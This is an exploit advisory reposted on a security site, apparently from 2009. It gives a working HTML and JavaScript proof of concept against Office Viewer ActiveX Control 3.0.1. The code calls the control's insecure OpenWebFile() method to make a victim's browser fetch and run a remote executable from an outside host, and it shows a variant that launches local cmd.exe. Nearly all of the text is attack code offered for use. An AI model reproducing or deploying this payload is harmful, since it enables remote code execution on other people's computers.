Office Viewer ActiveX Control 3.0.1 Remote File Execution Exploit
|
来源:www.vfcocus.net 作者:Houssamix 发布时间:2009-01-14
|
|
=======================================================================================<br> Author: Houssamix <br> =======================================================================================<br>
Office Viewer ActiveX Control v 3.0.1 Remote File execution exploit <br> download : http://www.anydraw.com/download/EOfficeOCX.exe <br>
Tested on Windows XP Professional SP2 , with Internet Explorer 6 <br><br>
description : this use to insecure methods "OpenWebFile()" for execute remote file in pc victime <br> u can also execute a local file in pc victime usign this methode "Open()" , just change the function do_it with this : <b> function Do_it() { File = "c:\\windows\\system32\\cmd.exe" hsmx.OpenWebFile(File) } <br> =======================================================================================<br> <HTML> <BODY> <object id=hsmx classid="clsid:{97AF4A45-49BE-4485-9F55-91AB40F288F2}"></object>
<SCRIPT>
function Do_it() { File = "http://test.com/file.exe" hsmx.OpenWebFile(File) }
</SCRIPT> <input language=JavaScript onclick=Do_it() type=button value="exploit">
</body> </HTML>
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|